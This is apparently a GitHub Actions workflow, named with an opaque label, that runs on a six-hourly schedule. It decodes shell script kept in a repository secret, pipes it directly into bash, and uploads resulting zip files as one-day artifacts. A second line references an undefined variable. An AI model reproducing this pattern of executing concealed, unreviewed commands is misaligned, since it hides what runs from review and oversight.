name: liangfangzhaogang
on:
  workflow_dispatch:

  schedule:
    - cron: '38 0,6,12,18 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: liangfangzhaogang
        env:
          csdjp69099: ${{ secrets.csdjp69099 }}
        run: |
          printf '%s' "$csdjp69099" | jq -r .nla26 | /bin/bash
          printf '%s' "$qu9413" | jq -r .oc6479 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: ItfK1gJH
          path: "*.zip"
          retention-days: 1
